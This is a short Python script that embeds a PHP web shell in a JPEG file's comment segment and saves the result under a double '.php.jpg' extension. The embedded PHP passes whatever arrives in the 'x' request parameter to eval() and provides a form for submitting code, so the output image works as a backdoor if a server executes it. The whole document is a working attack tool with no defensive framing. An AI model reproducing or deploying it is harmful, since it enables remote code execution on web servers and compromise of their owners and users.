#!/usr/bin/env python

import sys
import os
import struct

php = """
<hr>
<?php
	ini_set('log_errors', false);
	ini_set('display_errors', true);

	$x = $_REQUEST['x'];
	if (get_magic_quotes_gpc()) {
		$x = stripslashes($x);
	}
?>
<pre><?php eval($x) ?></pre>
<form method="POST">
	<textarea name="x" cols="80" rows="10"><?php
		echo htmlspecialchars($x)
	?></textarea>
	<br>
	<input type="submit">
</form>
<hr>
"""

if __name__ == '__main__':
	if len(sys.argv) != 2 and len(sys.argv) != 3:
		sys.exit('Usage: %s <jpeg file> [php file]' % sys.argv[0])

	path = sys.argv[1]
	data = open(path, 'rb').read()

	if len(data) < 2 or struct.unpack('>H', data[:2]) != (0xffd8,):
		sys.exit('Invalid jpeg file!')

	if len(sys.argv) == 3:
		php = open(sys.argv[2]).read()

	# JPEG Comment segment: 2-byte header, 2-byte length and data.
	# Make sure we don't have a null byte before the php code.
	cnt = max(0x0101, len(php))
	if (cnt & 0xff) == 0:
		cnt += 1

	data = (
		data[:2] +
		struct.pack('>H', 0xfffe) +
		struct.pack('>H', cnt) +
		php +
		'\0' * (cnt - len(php)) +
		data[2:]
	)

	base, ext = os.path.splitext(path)
	open(base + '.php' + ext, 'wb').write(data)
